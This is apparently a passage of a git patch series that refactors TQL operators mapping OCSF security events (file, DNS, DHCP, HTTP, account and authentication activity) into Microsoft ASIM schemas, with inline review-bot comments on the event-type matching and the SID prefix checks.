- vendor_name: "Microsoft",
- },
- version: "1.8.0",
- },
- device: {
- hostname: "host1",
- },
- actor: {
- user: {
- name: "alice",
- },
- },
- file: {
- path: "C:\\tmp\\payload.exe",
- name: "payload.exe",
- },
-}, {
- activity_id: 5,
- activity_name: "Rename",
- category_uid: 1,
- class_uid: 1001,
- class_name: "File System Activity",
- type_uid: 100105,
- time: 2026-01-01T00:00:05Z,
- severity_id: 1,
- status: "Success",
- metadata: {
- original_event_uid: "file-2",
- product: {
- name: "Endpoint",
- vendor_name: "Microsoft",
- },
- version: "1.8.0",
- },
- device: {
- hostname: "host1",
- },
- actor: {
- user: {
- name: "alice",
- },
- },
- file: {
- path: "C:\\tmp\\payload.exe",
- name: "payload.exe",
- },
- file_result: {
- path: "C:\\tmp\\invoice.pdf.exe",
- name: "invoice.pdf.exe",
- },
-}, {
 activity_id: 6,
 activity_name: "Traffic",
 category_uid: 4,
@@ -95,94 +31,7 @@ from {
 bytes_out: 100,
 bytes_in: 200,
 },
-}, {
- activity_id: 1,
- activity_name: "Query",
- category_uid: 4,
- class_uid: 4003,
- class_name: "DNS Activity",
- type_uid: 400301,
- time: 2026-01-01T00:00:02Z,
- severity_id: 1,
- status: "Success",
- rcode: "NA",
- metadata: {
- original_event_uid: "dns-1",
- product: {
- name: "DNS",
- vendor_name: "Microsoft",
- },
- version: "1.8.0",
- },
- device: {
- hostname: "dns1",
- },
- query: {
- hostname: "example.org",
- type: "A",
- class: "IN",
- },
- src_endpoint: {
- ip: 10.0.0.1,
- },
-}, {
- activity_id: 5,
- activity_name: "Ack",
- category_uid: 4,
- class_uid: 4004,
- class_name: "DHCP Activity",
- type_uid: 400405,
- time: 2026-01-01T00:00:03Z,
- severity_id: 1,
- status: "Success",
- metadata: {
- original_event_uid: "dhcp-1",
- product: {
- name: "DHCP",
- vendor_name: "Microsoft",
- },
- version: "1.8.0",
- },
- device: {
- hostname: "dhcp1",
- },
- src_endpoint: {
- hostname: "client1",
- ip: 10.0.0.50,
- mac: "00:11:22:33:44:55",
- },
-}, {
- activity_id: 3,
- activity_name: "Get",
- category_uid: 4,
- class_uid: 4002,
- class_name: "HTTP Activity",
- type_uid: 400203,
- time: 2026-01-01T00:00:04Z,
- severity_id: 1,
- status: "Success",
- metadata: {
- original_event_uid: "web-1",
- product: {
- name: "Proxy",
- vendor_name: "Microsoft",
- },
- version: "1.8.0",
- },
- device: {
- hostname: "proxy1",
- },
- http_request: {
- http_method: "GET",
- url: {
- url_string: "https://example.org/index.html",
- },
- },
- http_response: {
- code: 200,
- },
 }
-where class_uid == 4001
 microsoft::asim::ocsf::map event=this
 name = @name
 sort EventOriginalUid
From 68961fd888b5149c9c3ab0d45c44b772c4acbd91 Mon Sep 17 00:00:00 2001
From: Matthias Vallentin
Date: Fri, 12 Jun 2026 11:46:39 +0200
Subject: [PATCH 25/27] Flatten ASIM OCSF helper namespace

Move the shared ASIM OCSF common mapper setup out of the helpers namespace. The package only has one helper UDO here, so callers can use microsoft::asim::ocsf::common directly.

Assisted-by: GPT-5 (Codex)
---
 microsoft/operators/asim/ocsf/account_change.tql | 2 +-
 microsoft/operators/asim/ocsf/authentication.tql | 2 +-
 microsoft/operators/asim/ocsf/authorize_session.tql | 2 +-
 microsoft/operators/asim/ocsf/{helpers => }/common.tql | 0
 microsoft/operators/asim/ocsf/compliance_finding.tql | 2 +-
 microsoft/operators/asim/ocsf/detection_finding.tql | 2 +-
 microsoft/operators/asim/ocsf/dhcp_activity.tql | 2 +-
 microsoft/operators/asim/ocsf/dns_activity.tql | 2 +-
 microsoft/operators/asim/ocsf/entity_management.tql | 2 +-
 microsoft/operators/asim/ocsf/event_log_activity.tql | 2 +-
 microsoft/operators/asim/ocsf/file_system_activity.tql | 2 +-
 microsoft/operators/asim/ocsf/group_management.tql | 2 +-
 microsoft/operators/asim/ocsf/http_activity.tql | 2 +-
 microsoft/operators/asim/ocsf/network_activity.tql | 2 +-
 microsoft/operators/asim/ocsf/process_activity.tql | 2 +-
 microsoft/operators/asim/ocsf/scheduled_job_activity.tql | 2 +-
 microsoft/operators/asim/ocsf/windows_service_activity.tql | 2 +-
 17 files changed, 16 insertions(+), 16 deletions(-)
 rename microsoft/operators/asim/ocsf/{helpers => }/common.tql (100%)

diff --git a/microsoft/operators/asim/ocsf/account_change.tql b/microsoft/operators/asim/ocsf/account_change.tql
index d58c398..b865000 100644
--- a/microsoft/operators/asim/ocsf/account_change.tql
+++ b/microsoft/operators/asim/ocsf/account_change.tql
@@ -11,7 +11,7 @@ assert $event.class_uid == 3001
 ocsf = $event
-microsoft::asim::ocsf::helpers::common
+microsoft::asim::ocsf::common
 @name = "asim.user_management"
 asim.EventSchema = "UserManagement"
diff --git a/microsoft/operators/asim/ocsf/authentication.tql b/microsoft/operators/asim/ocsf/authentication.tql
index dadfca1..72bd312 100644
--- a/microsoft/operators/asim/ocsf/authentication.tql
+++ b/microsoft/operators/asim/ocsf/authentication.tql
@@ -11,7 +11,7 @@ assert $event.class_uid == 3002
 ocsf = $event
-microsoft::asim::ocsf::helpers::common
+microsoft::asim::ocsf::common
 @name = "asim.authentication"
 asim.EventSchema = "Authentication"
diff --git a/microsoft/operators/asim/ocsf/authorize_session.tql b/microsoft/operators/asim/ocsf/authorize_session.tql
index ac4537a..18f460f 100644
--- a/microsoft/operators/asim/ocsf/authorize_session.tql
+++ b/microsoft/operators/asim/ocsf/authorize_session.tql
@@ -11,7 +11,7 @@ assert $event.class_uid == 3003
 ocsf = $event
-microsoft::asim::ocsf::helpers::common
+microsoft::asim::ocsf::common
 @name = "asim.authentication"
 asim.EventSchema = "Authentication"
diff --git a/microsoft/operators/asim/ocsf/helpers/common.tql b/microsoft/operators/asim/ocsf/common.tql
similarity index 100%
rename from microsoft/operators/asim/ocsf/helpers/common.tql
rename to microsoft/operators/asim/ocsf/common.tql
diff --git a/microsoft/operators/asim/ocsf/compliance_finding.tql b/microsoft/operators/asim/ocsf/compliance_finding.tql
index c392f25..901f1e2 100644
--- a/microsoft/operators/asim/ocsf/compliance_finding.tql
+++ b/microsoft/operators/asim/ocsf/compliance_finding.tql
@@ -11,7 +11,7 @@ assert $event.class_uid == 2003
 ocsf = $event
-microsoft::asim::ocsf::helpers::common
+microsoft::asim::ocsf::common
 @name = "asim.alert_event"
 asim.EventSchema = "AlertEvent"
diff --git a/microsoft/operators/asim/ocsf/detection_finding.tql b/microsoft/operators/asim/ocsf/detection_finding.tql
index 4fc1a17..4721bdb 100644
--- a/microsoft/operators/asim/ocsf/detection_finding.tql
+++ b/microsoft/operators/asim/ocsf/detection_finding.tql
@@ -26,7 +26,7 @@ let $threat_categories = {
 worm: "Worm",
 }
-microsoft::asim::ocsf::helpers::common
+microsoft::asim::ocsf::common
 @name = "asim.alert_event"
 asim.EventSchema = "AlertEvent"
diff --git a/microsoft/operators/asim/ocsf/dhcp_activity.tql b/microsoft/operators/asim/ocsf/dhcp_activity.tql
index 5b8b90a..8f0c046 100644
--- a/microsoft/operators/asim/ocsf/dhcp_activity.tql
+++ b/microsoft/operators/asim/ocsf/dhcp_activity.tql
@@ -11,7 +11,7 @@ assert $event.class_uid == 4004
 ocsf = $event
-microsoft::asim::ocsf::helpers::common
+microsoft::asim::ocsf::common
 @name = "asim.dhcp_event"
 asim.EventSchema = "DhcpEvent"
diff --git a/microsoft/operators/asim/ocsf/dns_activity.tql b/microsoft/operators/asim/ocsf/dns_activity.tql
index b96d045..8f3a986 100644
--- a/microsoft/operators/asim/ocsf/dns_activity.tql
+++ b/microsoft/operators/asim/ocsf/dns_activity.tql
@@ -11,7 +11,7 @@ assert $event.class_uid == 4003
 ocsf = $event
-microsoft::asim::ocsf::helpers::common
+microsoft::asim::ocsf::common
 @name = "asim.dns"
 asim.EventSchema = "Dns"
diff --git a/microsoft/operators/asim/ocsf/entity_management.tql b/microsoft/operators/asim/ocsf/entity_management.tql
index 01aae60..96d4d1c 100644
--- a/microsoft/operators/asim/ocsf/entity_management.tql
+++ b/microsoft/operators/asim/ocsf/entity_management.tql
@@ -11,7 +11,7 @@ assert $event.class_uid == 3004
 ocsf = $event
-microsoft::asim::ocsf::helpers::common
+microsoft::asim::ocsf::common
 @name = "asim.audit_event"
 asim.EventSchema = "AuditEvent"
diff --git a/microsoft/operators/asim/ocsf/event_log_activity.tql b/microsoft/operators/asim/ocsf/event_log_activity.tql
index cd93063..8b5f78d 100644
--- a/microsoft/operators/asim/ocsf/event_log_activity.tql
+++ b/microsoft/operators/asim/ocsf/event_log_activity.tql
@@ -11,7 +11,7 @@ assert $event.class_uid == 1008
 ocsf = $event
-microsoft::asim::ocsf::helpers::common
+microsoft::asim::ocsf::common
 @name = "asim.audit_event"
 asim.EventSchema = "AuditEvent"
diff --git a/microsoft/operators/asim/ocsf/file_system_activity.tql b/microsoft/operators/asim/ocsf/file_system_activity.tql
index 198c644..c271c3b 100644
--- a/microsoft/operators/asim/ocsf/file_system_activity.tql
+++ b/microsoft/operators/asim/ocsf/file_system_activity.tql
@@ -11,7 +11,7 @@ assert $event.class_uid == 1001
 ocsf = $event
-microsoft::asim::ocsf::helpers::common
+microsoft::asim::ocsf::common
 @name = "asim.file_event"
 asim.EventSchema = "FileEvent"
diff --git a/microsoft/operators/asim/ocsf/group_management.tql b/microsoft/operators/asim/ocsf/group_management.tql
index 696296e..5213151 100644
--- a/microsoft/operators/asim/ocsf/group_management.tql
+++ b/microsoft/operators/asim/ocsf/group_management.tql
@@ -11,7 +11,7 @@ assert $event.class_uid == 3006
 ocsf = $event
-microsoft::asim::ocsf::helpers::common
+microsoft::asim::ocsf::common
 @name = "asim.user_management"
 asim.EventSchema = "UserManagement"
diff --git a/microsoft/operators/asim/ocsf/http_activity.tql b/microsoft/operators/asim/ocsf/http_activity.tql
index a8bde76..8fa63bd 100644
--- a/microsoft/operators/asim/ocsf/http_activity.tql
+++ b/microsoft/operators/asim/ocsf/http_activity.tql
@@ -11,7 +11,7 @@ assert $event.class_uid == 4002
 ocsf = $event
-microsoft::asim::ocsf::helpers::common
+microsoft::asim::ocsf::common
 @name = "asim.web_session"
 asim.EventSchema = "WebSession"
diff --git a/microsoft/operators/asim/ocsf/network_activity.tql b/microsoft/operators/asim/ocsf/network_activity.tql
index 8bc833f..72f855a 100644
--- a/microsoft/operators/asim/ocsf/network_activity.tql
+++ b/microsoft/operators/asim/ocsf/network_activity.tql
@@ -11,7 +11,7 @@ assert $event.class_uid == 4001
 ocsf = $event
-microsoft::asim::ocsf::helpers::common
+microsoft::asim::ocsf::common
 @name = "asim.network_session"
 asim.EventSchema = "NetworkSession"
diff --git a/microsoft/operators/asim/ocsf/process_activity.tql b/microsoft/operators/asim/ocsf/process_activity.tql
index 8294f0a..bfb9786 100644
--- a/microsoft/operators/asim/ocsf/process_activity.tql
+++ b/microsoft/operators/asim/ocsf/process_activity.tql
@@ -11,7 +11,7 @@ assert $event.class_uid == 1007
 ocsf = $event
-microsoft::asim::ocsf::helpers::common
+microsoft::asim::ocsf::common
 @name = "asim.process_event"
 asim.EventSchema = "ProcessEvent"
diff --git a/microsoft/operators/asim/ocsf/scheduled_job_activity.tql b/microsoft/operators/asim/ocsf/scheduled_job_activity.tql
index 731782f..4f93119 100644
--- a/microsoft/operators/asim/ocsf/scheduled_job_activity.tql
+++ b/microsoft/operators/asim/ocsf/scheduled_job_activity.tql
@@ -11,7 +11,7 @@ assert $event.class_uid == 1006
 ocsf = $event
-microsoft::asim::ocsf::helpers::common
+microsoft::asim::ocsf::common
 @name = "asim.audit_event"
 asim.EventSchema = "AuditEvent"
diff --git a/microsoft/operators/asim/ocsf/windows_service_activity.tql b/microsoft/operators/asim/ocsf/windows_service_activity.tql
index 6c02cd3..333b731 100644
--- a/microsoft/operators/asim/ocsf/windows_service_activity.tql
+++ b/microsoft/operators/asim/ocsf/windows_service_activity.tql
@@ -11,7 +11,7 @@ assert $event.class_uid == 201004
 ocsf = $event
-microsoft::asim::ocsf::helpers::common
+microsoft::asim::ocsf::common
 @name = "asim.audit_event"
 asim.EventSchema = "AuditEvent"
From 1cdbfc10f81daa53b9d30f5e36e77daa49327529 Mon Sep 17 00:00:00 2001
From: Matthias Vallentin
Date: Fri, 12 Jun 2026 12:46:35 +0200
Subject: [PATCH 26/27] Keep mapper scratch inside event

Route ASIM, Graph, and Windows mapping scratch state through the explicit event parameter instead of top-level temporary fields. This keeps nested mapping calls from leaking ocsf, asim, graph, or windows records into the caller scope. Add scope regressions that map nested payloads and assert the outer fields remain untouched.

Assisted-by: GPT-5 (Codex)
---
 .../operators/asim/ocsf/account_change.tql | 70 ++++----
 .../operators/asim/ocsf/authentication.tql | 84 +++++-----
 .../operators/asim/ocsf/authorize_session.tql | 80 +++++-----
 microsoft/operators/asim/ocsf/common.tql | 123 ++++++++-------
 .../asim/ocsf/compliance_finding.tql | 52 +++---
 .../operators/asim/ocsf/detection_finding.tql | 52 +++---
 .../operators/asim/ocsf/dhcp_activity.tql | 28 ++--
 .../operators/asim/ocsf/dns_activity.tql | 36 ++---
 .../operators/asim/ocsf/entity_management.tql | 62 ++++----
 .../asim/ocsf/event_log_activity.tql | 62 ++++----
 .../asim/ocsf/file_system_activity.tql | 54 +++----
 .../operators/asim/ocsf/group_management.tql | 62 ++++----
 .../operators/asim/ocsf/http_activity.tql | 24 +--
 .../operators/asim/ocsf/network_activity.tql | 44 +++---
 .../operators/asim/ocsf/process_activity.tql | 42 ++---
 .../asim/ocsf/scheduled_job_activity.tql | 62 ++++----
 .../asim/ocsf/windows_service_activity.tql | 62 ++++----
 microsoft/operators/graph/ocsf/base.tql | 17 +-
 ...ompliance_policy_setting_state_summary.tql | 55 ++++---
 .../graph/ocsf/events/defender_alert.tql | 87 +++++-----
 .../graph/ocsf/events/defender_incident.tql | 131 +++++++--------
 .../graph/ocsf/events/detected_app.tql | 43 ++---
 .../graph/ocsf/events/directory_audit.tql | 141 +++++++++--------
 .../graph/ocsf/events/managed_device.tql | 77 ++++-----
 .../graph/ocsf/events/risk_detection.tql | 75 +++++----
 .../graph/ocsf/events/risky_user.tql | 51 +++---
 .../operators/graph/ocsf/events/sign_in.tql | 149 +++++++++---------
 microsoft/operators/graph/ocsf/map.tql | 43 +++--
 microsoft/operators/windows/ocsf/base.tql | 13 +-
 .../windows/ocsf/events/account_change.tql | 31 ++--
 .../ocsf/events/application_crash_report.tql | 33 ++--
 .../windows/ocsf/events/application_error.tql | 35 ++--
 .../windows/ocsf/events/application_hang.tql | 33 ++--
 .../windows/ocsf/events/authorize_session.tql | 27 ++--
 .../windows/ocsf/events/defender_asr.tql | 55 ++++---
 .../ocsf/events/defender_detection.tql | 75 +++++----
 .../ocsf/events/defender_signature_update.tql | 15 +-
 .../windows/ocsf/events/defender_tamper.tql | 23 +--
 .../windows/ocsf/events/defender_threat.tql | 59 +++----
 .../windows/ocsf/events/eventlog_clear.tql | 27 ++--
 .../windows/ocsf/events/eventlog_start.tql | 17 +-
 .../windows/ocsf/events/eventlog_stop.tql | 17 +-
 .../ocsf/events/explicit_credential_logon.tql | 51 +++---
 .../windows/ocsf/events/group_management.tql | 41 ++---
 .../ocsf/events/kerberos_preauth_failed.tql | 31 ++--
 .../ocsf/events/kerberos_service_ticket.tql | 37 +++--
 .../operators/windows/ocsf/events/logon.tql | 51 +++---
 .../windows/ocsf/events/logon_failed.tql | 49 +++---
 .../windows/ocsf/events/ntlm_auth.tql | 29 ++--
 .../windows/ocsf/events/powershell_error.tql | 37 +++--
 .../ocsf/events/powershell_module_logging.tql | 17 +-
 .../ocsf/events/powershell_script_block.tql | 29 ++--
 .../powershell_script_block_invocation.tql | 23 +--
 .../windows/ocsf/events/process_create.tql | 51 +++---
 .../ocsf/events/scheduled_task_create.tql | 29 ++--
 .../windows/ocsf/events/service_crashed.tql | 21 ++-
 .../windows/ocsf/events/service_install.tql | 33 ++--
 .../ocsf/events/service_install_scm.tql | 23 +--
 .../windows/ocsf/events/task_lifecycle.tql | 21 ++-
 .../windows/ocsf/events/task_run.tql | 51 +++---
 microsoft/operators/windows/ocsf/map.tql | 106 ++++++-------
 microsoft/tests/asim/scope.tql | 32 ++++
 microsoft/tests/asim/scope.txt | 38 +++++
 microsoft/tests/graph/ocsf/scope.tql | 38 +++++
 microsoft/tests/graph/ocsf/scope.txt | 6 +
 microsoft/tests/ocsf/scope-windows.tql | 11 ++
 microsoft/tests/ocsf/scope-windows.txt | 6 +
 67 files changed, 1765 insertions(+), 1424 deletions(-)
 create mode 100644 microsoft/tests/asim/scope.tql
 create mode 100644 microsoft/tests/asim/scope.txt
 create mode 100644 microsoft/tests/graph/ocsf/scope.tql
 create mode 100644 microsoft/tests/graph/ocsf/scope.txt
 create mode 100644 microsoft/tests/ocsf/scope-windows.tql
 create mode 100644 microsoft/tests/ocsf/scope-windows.txt

diff --git a/microsoft/operators/asim/ocsf/account_change.tql b/microsoft/operators/asim/ocsf/account_change.tql
index b865000..5b79004 100644
--- a/microsoft/operators/asim/ocsf/account_change.tql
+++ b/microsoft/operators/asim/ocsf/account_change.tql
@@ -7,48 +7,48 @@ args:
 type: field
 ---
-assert $event.class_uid == 3001
+$event = {...$event, ocsf: $event, asim: {}}
-ocsf = $event
+assert $event.ocsf.class_uid == 3001
-microsoft::asim::ocsf::common
+microsoft::asim::ocsf::common event=$event
 @name = "asim.user_management"
-asim.EventSchema = "UserManagement"
-asim.EventSchemaVersion = "0.1.2"
-asim.EventSeverity = asim.EventSeverity? else "Informational"
-asim.ActorUsername = ocsf.actor?.user?.email_addr? else ocsf.actor?.user?.name? else ocsf.actor?.user?.uid? else ocsf.actor?.app_name? else ocsf.actor?.app_uid?
-if ocsf.actor?.user?.domain? != null and ocsf.actor?.user?.name? != null {
- asim.ActorUsername = f"{ocsf.actor.user.domain}\\{ocsf.actor.user.name}"
- asim.ActorUsernameType = "Windows"
+$event.asim.EventSchema = "UserManagement"
+$event.asim.EventSchemaVersion = "0.1.2"
+$event.asim.EventSeverity = $event.asim.EventSeverity? else "Informational"
+$event.asim.ActorUsername = $event.ocsf.actor?.user?.email_addr? else $event.ocsf.actor?.user?.name? else $event.ocsf.actor?.user?.uid? else $event.ocsf.actor?.app_name? else $event.ocsf.actor?.app_uid?
+if $event.ocsf.actor?.user?.domain? != null and $event.ocsf.actor?.user?.name? != null {
+ $event.asim.ActorUsername = f"{$event.ocsf.actor.user.domain}\\{$event.ocsf.actor.user.name}"
+ $event.asim.ActorUsernameType = "Windows"
 }
-asim.ActorUserId = ocsf.actor?.user?.uid?
-asim.ActorUserIdType = "SID" if asim.ActorUserId?.starts_with("S-") == true
+$event.asim.ActorUserId = $event.ocsf.actor?.user?.uid?
+$event.asim.ActorUserIdType = "SID" if $event.asim.ActorUserId?.starts_with("S-") == true
-match ocsf.activity_name {
- "Create" => { asim.EventType = "UserCreated" }
- "Delete" => { asim.EventType = "UserDeleted" }
- "Update" => { asim.EventType = "UserModified" }
- "Lock" => { asim.EventType = "UserLocked" }
- "Unlock" => { asim.EventType = "UserUnlocked" }
- "Disable" => { asim.EventType = "UserDisabled" }
- "Enable" => { asim.EventType = "UserEnabled" }
- "Password Change" => { asim.EventType = "PasswordChanged" }
- "Password Reset" => { asim.EventType = "PasswordReset" }
- _ => { asim.EventType = "UserModified" }
+match $event.ocsf.activity_name {
+ "Create" => { $event.asim.EventType = "UserCreated"}
+ "Delete" => { $event.asim.EventType = "UserDeleted"}
+ "Update" => { $event.asim.EventType = "UserModified"}
+ "Lock" => { $event.asim.EventType = "UserLocked"}
+ "Unlock" => { $event.asim.EventType = "UserUnlocked"}
+ "Disable" => { $event.asim.EventType = "UserDisabled"}
+ "Enable" => { $event.asim.EventType = "UserEnabled"}
+ "Password Change" => { $event.asim.EventType = "PasswordChanged"}
+ "Password Reset" => { $event.asim.EventType = "PasswordReset"}
+ _ => { $event.asim.EventType = "UserModified"}
 }
-asim.TargetUsername = ocsf.user?.email_addr? else ocsf.user?.name? else ocsf.user?.uid?
-if ocsf.user?.domain? != null and ocsf.user?.name? != null {
- asim.TargetUsername = f"{ocsf.user.domain}\\{ocsf.user.name}"
- asim.TargetUsernameType = "Windows"
+$event.asim.TargetUsername = $event.ocsf.user?.email_addr? else $event.ocsf.user?.name? else $event.ocsf.user?.uid?
+if $event.ocsf.user?.domain? != null and $event.ocsf.user?.name? != null {
+ $event.asim.TargetUsername = f"{$event.ocsf.user.domain}\\{$event.ocsf.user.name}"
+ $event.asim.TargetUsernameType = "Windows"
 }
-asim.TargetUserId = ocsf.user?.uid?
-asim.TargetUserIdType = "SID" if asim.TargetUserId?.starts_with("S-") == true
-asim.GroupName = ocsf.group?.name?
-asim.GroupId = ocsf.group?.uid?
-asim.GroupIdType = "SID" if asim.GroupId?.starts_with("S-") == true
-asim.SrcIpAddr = ocsf.src_endpoint?.ip?
-asim.SrcHostname = ocsf.src_endpoint?.hostname?
+$event.asim.TargetUserId = $event.ocsf.user?.uid?
+$event.asim.TargetUserIdType = "SID" if $event.asim.TargetUserId?.starts_with("S-") == true
+$event.asim.GroupName = $event.ocsf.group?.name?
+$event.asim.GroupId = $event.ocsf.group?.uid?
+$event.asim.GroupIdType = "SID" if $event.asim.GroupId?.starts_with("S-") == true
+$event.asim.SrcIpAddr = $event.ocsf.src_endpoint?.ip?
+$event.asim.SrcHostname = $event.ocsf.src_endpoint?.hostname?
-$event = move asim
+$event = move $event.asim
diff --git a/microsoft/operators/asim/ocsf/authentication.tql b/microsoft/operators/asim/ocsf/authentication.tql
index 72bd312..cf3d9e9 100644
--- a/microsoft/operators/asim/ocsf/authentication.tql
+++ b/microsoft/operators/asim/ocsf/authentication.tql
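Review bot: The `match $event.ocsf.activity_name { … }` block keys on the free-text display name, and its `_ => { $event.asim.EventType = "UserModified"}` arm also fires when `activity_name` is missing or names an Account Change activity not listed here (policy attach/detach, MFA-factor changes), so those land in the ASIM UserManagement table indistinguishable from a routine profile update. Dispatching on the numeric `activity_id` instead (OCSF pairs each activity with a stable id; the fixtures in this series carry `activity_id: 1` alongside `"Create"`) is robust against vendor spelling and capitalization, and an activity with no ASIM equivalent is better left without an `EventType` than silently coerced to one. Separately, `$event.asim.ActorUserIdType = "SID" if $event.asim.ActorUserId?.starts_with("S-") == true` (and the Target/Group variants) tags any uid beginning with `S-` as a Windows SID; `starts_with("S-1-")` matches the actual SID revision prefix and avoids mislabeling other identifier schemes that happen to start with `S-`.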
@@ -7,61 +7,61 @@ args:
 type: field
 ---
-assert $event.class_uid == 3002
+$event = {...$event, ocsf: $event, asim: {}}
-ocsf = $event
+assert $event.ocsf.class_uid == 3002
-microsoft::asim::ocsf::common
+microsoft::asim::ocsf::common event=$event
 @name = "asim.authentication"
-asim.EventSchema = "Authentication"
-asim.EventSchemaVersion = "0.1.4"
-match ocsf.activity_name {
- "Logoff" => { asim.EventType = "Logoff" }
- _ => { asim.EventType = "Logon" }
+$event.asim.EventSchema = "Authentication"
+$event.asim.EventSchemaVersion = "0.1.4"
+match $event.ocsf.activity_name {
+ "Logoff" => { $event.asim.EventType = "Logoff"}
+ _ => { $event.asim.EventType = "Logon"}
 }
-match ocsf.logon_type? {
- "System" => { asim.EventSubType = "System" }
+match $event.ocsf.logon_type? {
+ "System" => { $event.asim.EventSubType = "System"}
 "Interactive" | "Cached Interactive" | "Unlock" | "Cached Unlock" => {
- asim.EventSubType = "Interactive"
+ $event.asim.EventSubType = "Interactive"
 }
- "Network" | "Network Cleartext" => { asim.EventSubType = "Remote" }
+ "Network" | "Network Cleartext" => { $event.asim.EventSubType = "Remote"}
 "Remote Interactive" | "Cached Remote Interactive" => {
- asim.EventSubType = "RemoteInteractive"
+ $event.asim.EventSubType = "RemoteInteractive"
 }
- "OS Service" => { asim.EventSubType = "Service" }
+ "OS Service" => { $event.asim.EventSubType = "Service"}
 _ => {}
 }
-if ocsf.logon_type? != null {
- asim.EventOriginalSubType = ocsf.logon_type
+if $event.ocsf.logon_type? != null {
+ $event.asim.EventOriginalSubType = $event.ocsf.logon_type
 }
-asim.ActorUsername = ocsf.actor?.user?.email_addr? else ocsf.actor?.user?.name? else ocsf.actor?.user?.uid?
-if ocsf.actor?.user?.domain? != null and ocsf.actor?.user?.name? != null {
- asim.ActorUsername = f"{ocsf.actor.user.domain}\\{ocsf.actor.user.name}"
- asim.ActorUsernameType = "Windows"
+$event.asim.ActorUsername = $event.ocsf.actor?.user?.email_addr? else $event.ocsf.actor?.user?.name? else $event.ocsf.actor?.user?.uid?
+if $event.ocsf.actor?.user?.domain? != null and $event.ocsf.actor?.user?.name? != null {
+ $event.asim.ActorUsername = f"{$event.ocsf.actor.user.domain}\\{$event.ocsf.actor.user.name}"
+ $event.asim.ActorUsernameType = "Windows"
 }
-asim.ActorUserId = ocsf.actor?.user?.uid?
-asim.ActorUserIdType = "SID" if asim.ActorUserId?.starts_with("S-") == true
-asim.ActorSessionId = ocsf.actor?.session?.uid? else ocsf.actor?.session?.uid_alt?
-asim.TargetUsername = ocsf.user?.email_addr? else ocsf.user?.name? else ocsf.user?.uid?
-if ocsf.user?.domain? != null and ocsf.user?.name? != null {
- asim.TargetUsername = f"{ocsf.user.domain}\\{ocsf.user.name}"
- asim.TargetUsernameType = "Windows"
- asim.TargetDomain = ocsf.user.domain
- asim.TargetDomainType = "Windows"
+$event.asim.ActorUserId = $event.ocsf.actor?.user?.uid?
+$event.asim.ActorUserIdType = "SID" if $event.asim.ActorUserId?.starts_with("S-") == true
+$event.asim.ActorSessionId = $event.ocsf.actor?.session?.uid? else $event.ocsf.actor?.session?.uid_alt?
+$event.asim.TargetUsername = $event.ocsf.user?.email_addr? else $event.ocsf.user?.name? else $event.ocsf.user?.uid?
+if $event.ocsf.user?.domain? != null and $event.ocsf.user?.name? != null {
+ $event.asim.TargetUsername = f"{$event.ocsf.user.domain}\\{$event.ocsf.user.name}"
+ $event.asim.TargetUsernameType = "Windows"
+ $event.asim.TargetDomain = $event.ocsf.user.domain
+ $event.asim.TargetDomainType = "Windows"
 }
-asim.TargetUserId = ocsf.user?.uid?
-asim.TargetUserIdType = "SID" if asim.TargetUserId?.starts_with("S-") == true
-asim.TargetSessionId = ocsf.session?.uid? else ocsf.session?.uid_alt?
-asim.SrcIpAddr = ocsf.src_endpoint?.ip?
-asim.SrcHostname = ocsf.src_endpoint?.hostname?
-asim.SrcPortNumber = ocsf.src_endpoint?.port?
-asim.TargetHostname = ocsf.dst_endpoint?.hostname? else ocsf.device?.hostname?
-asim.TargetAppId = ocsf.service?.uid? else ocsf.dst_endpoint?.uid?
-asim.TargetAppName = ocsf.service?.name? else ocsf.dst_endpoint?.svc_name?
-asim.LogonProtocol = ocsf.auth_protocol?
-if ocsf.auth_factors? != null {
- asim.LogonMethod = ocsf.auth_factors[0]?.factor_type?
+$event.asim.TargetUserId = $event.ocsf.user?.uid?
+$event.asim.TargetUserIdType = "SID" if $event.asim.TargetUserId?.starts_with("S-") == true
+$event.asim.TargetSessionId = $event.ocsf.session?.uid? else $event.ocsf.session?.uid_alt?
+$event.asim.SrcIpAddr = $event.ocsf.src_endpoint?.ip?
+$event.asim.SrcHostname = $event.ocsf.src_endpoint?.hostname?
+$event.asim.SrcPortNumber = $event.ocsf.src_endpoint?.port?
+$event.asim.TargetHostname = $event.ocsf.dst_endpoint?.hostname? else $event.ocsf.device?.hostname?
+$event.asim.TargetAppId = $event.ocsf.service?.uid? else $event.ocsf.dst_endpoint?.uid?
+$event.asim.TargetAppName = $event.ocsf.service?.name? else $event.ocsf.dst_endpoint?.svc_name?
+$event.asim.LogonProtocol = $event.ocsf.auth_protocol?
+if $event.ocsf.auth_factors? != null {
+ $event.asim.LogonMethod = $event.ocsf.auth_factors[0]?.factor_type?
 }
-$event = move asim
+$event = move $event.asim
diff --git a/microsoft/operators/asim/ocsf/authorize_session.tql b/microsoft/operators/asim/ocsf/authorize_session.tql
index 18f460f..419c743 100644
--- a/microsoft/operators/asim/ocsf/authorize_session.tql
+++ b/microsoft/operators/asim/ocsf/authorize_session.tql
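Review bot: `match $event.ocsf.activity_name { "Logoff" => … _ => { $event.asim.EventType = "Logon"} }` turns every activity other than a literal `"Logoff"` into an ASIM `Logon` — including events with no `activity_name`, and the Kerberos ticket-style Authentication activities that this series' own `windows/ocsf/events/kerberos_service_ticket.tql` and `kerberos_preauth_failed.tql` mappers presumably emit — which inflates logon-based detections and hides what actually happened. Dispatching on `activity_id` and leaving `EventType` unset for anything that is not a logon or logoff keeps the Authentication table honest; the raw activity name would still be available through `EventOriginalType` if `common` records it (not visible in this hunk). `$event.asim.LogonMethod = $event.ocsf.auth_factors[0]?.factor_type?` also keeps only the first factor, so an MFA logon is indistinguishable from a single-factor one; joining all `factor_type` values would preserve that signal. The `starts_with("S-")` SID heuristic used for `ActorUserIdType` and `TargetUserIdType` would be tighter as `starts_with("S-1-")`.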
@@ -7,58 +7,58 @@ args: type: field --- -assert $event.class_uid == 3003 +$event = {...$event, ocsf: $event, asim: {}} -ocsf = $event +assert $event.ocsf.class_uid == 3003 -microsoft::asim::ocsf::common +microsoft::asim::ocsf::common event=$event @name = "asim.authentication" -asim.EventSchema = "Authentication" -asim.EventSchemaVersion = "0.1.4" -asim.EventType = "Elevate" -match ocsf.logon_type? { - "System" => { asim.EventSubType = "System" } +$event.asim.EventSchema = "Authentication" +$event.asim.EventSchemaVersion = "0.1.4" +$event.asim.EventType = "Elevate" +match $event.ocsf.logon_type? { + "System" => { $event.asim.EventSubType = "System"} "Interactive" | "Cached Interactive" | "Unlock" | "Cached Unlock" => { - asim.EventSubType = "Interactive" + $event.asim.EventSubType = "Interactive" } - "Network" | "Network Cleartext" => { asim.EventSubType = "Remote" } + "Network" | "Network Cleartext" => { $event.asim.EventSubType = "Remote"} "Remote Interactive" | 